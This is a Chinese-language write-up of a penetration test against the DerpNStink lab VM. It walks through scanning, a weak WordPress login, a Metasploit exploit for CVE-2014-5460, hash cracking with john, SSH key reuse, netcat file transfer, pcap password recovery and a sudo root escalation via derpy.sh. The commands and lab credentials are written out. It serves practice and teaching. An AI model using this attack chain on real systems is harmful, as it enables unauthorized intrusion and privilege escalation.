当前位置: 首页 > article >正文

【DERPNSTINK靶场渗透】

article 2024/11/29 19:41:57

文章目录

一、基础信息

二、信息收集

三、漏洞探测

四、SSH登录

五、提权

一、基础信息

Kali IP:192.168.20.128

靶机 IP:192.168.20.144

二、信息收集

nmap -sS -sV -p- -A 192.168.20.144

开放了21、22、80端口

基本思路是:

21端口ftp服务弱口令,匿名登陆等;22端口ssh服务暴力破解;80端口web服务各种类型漏洞

访问web页面查看源代码获得flag1

view-source:http://192.168.20.144/

目录探测

dirsearch -u http://192.168.20.144

发现有robots文件以及可能有php目录

继续扫描一下php目录

dirsearch -u http://192.168.20.144/php

发现有phpmyadmin页面,但是访问发现没有弱口令(其实有只是简单试了几个)

dirb http://192.168.20.144

内容比较多,发现了wordpress的登录页面

这里需要修改hosts文件将域名解析到靶机上

192.168.20.144  derpnstink.local

直接尝试弱口令admin:admin发现登录成功

三、漏洞探测

因为cms是wordpress,可以用wpscan扫描,也可以用其他扫描器探测

wpscan --url http://derpnstink.local/weblog/

发现存在Slideshow Gallery插件,版本为1.4.6,搜索一下历史漏洞

找到漏洞编号,利用msf搜索一下

search cve-2014-5460
use 0
set rhosts 192.168.20.144
set wp_user admin
set wp_password admin
set targeturi /weblog/
set rport 80
run

利用成功,接下来把我们得到的shell提升为交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

查看一下mysql进程

ps aux | grep mysql

发现靶机正在运行mysql

到网站根目录下查看一下文件,发现wp-config.php配置文件

发现数据库账户密码:root/mysql

前面我们已经探测到了phpmyadmin页面,尝试登录一下

成功登录后台,发现flag2

在wp_users表中发现另一个用户unclestinky和hash加密过后的密码

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

利用john解密

gzip -d /usr/share/wordlists/rockyou.txt.gz

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,没有其他信息

然后在home目录找到两个名字mrderp和stinky

四、SSH登录

可以再用得到的密码进行ssh登陆尝试

但是感觉是需要用密钥登录

直接在shell里切换用户,成功切换,并在桌面发现了第三个flag

暂时止步于此,然后看一下开始发现的ftp服务能否连接

同样使用这个账户密码:stinky/wedgie57

发现了ssh密钥文件,下载下来使用ssh密钥连接

chmod 600 key.txt

ssh -i key.txt stinky@192.168.20.144

失败了,查了一下说是可能是因为证书失效在后面加一段命令:

-o PubkeyAcceptedKeyTypes=+ssh-rsa

ssh -i key.txt stinky@192.168.20.144 -o PubkeyAcceptedKeyTypes=+ssh-rsa

在documents目录发现了一个叫derpissues.pcap的文件分析包

下载下来分析

这里查了一下可以用nc传文件

目标机器:nc -nv 192.168.20.146 8080  < derpissues.pcap

kali:   nc -lvvp 8080 > derpissues.pcap

分析一下流量包,通过追踪tcp流,发现了mrderp的密码:derpderpderpderpderpderpderp

账户密码:mrderp/derpderpderpderpderpderpderp

或者筛选流量:ip.src == 127.0.0.1 && http.request.method == "POST"

切换一下用户登录

五、提权

在Desktop目录找到helpdesk.log文件,查看一下文件内容

按照提示去访问这个地址https://pastebin.com/RzK9WfGw

或者查看可利用命令

可以看到提示:

允许mrderp用户在主机上以root用户权限读写执行/home/mrderp/binaries/目录下derpy开头的文件

然后echo一个shell到derpy.sh文件里面去(bash是linux里面基础的shell)

echo '/bin/bash' >> derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh

提权成功,得到flag4


http://www.kler.cn/a/414609.html

相关文章:

  • Python标识符命名规则
  • Unity ShaderLab 实现网格爆炸
  • C语言解决空瓶换水问题:高效算法与实现
  • 【动手学电机驱动】STM32-FOC(8)MCSDK Profiler 电机参数辨识
  • STL算法之基本算法<stl_algobase.h>
  • Spring Boot【三】
  • [在线实验]-Redis Docker镜像的下载与部署
  • C++中智能指针的使用及其原理 -- RAII,内存泄漏,shared_ptr,unique_ptr,weak_ptr
  • vue安装cypress及其部分用法
  • 基于C#+SQLite开发数据库应用的示例
  • 从传统IT运维到智能化运维的转型之路
  • 数据结构 (10)队列
  • linux基础2
  • 分布式搜索引擎Elasticsearch(一)
  • golang每日一题:context、goroutine相关
  • 【Ubuntu 24.04】How to Install and Use NVM
  • 【算法day2】数组:滑动窗口、前缀和及指针控制
  • 轻松解析 PDF 文档:深入了解 Python 的 pdfplumber 库
  • 原生html+css+ajax+php图片压缩后替换原input=file上传
  • 【配置】pycharm运行的项目如何修改名称(项目名称、模块名称)
  • 【AI系统】分布式通信与 NVLink
  • linux桌面qt应用程序UI自动化实现之dogtail
  • 3.5 Ui文件(界面文件)
  • Qml-TabBar类使用
  • 解决水库安全监测难题 长期无外接电源 低功耗设备智能化监测系统
  • Qt桌面应用开发 第八天(读写文件 文件编码 文件流)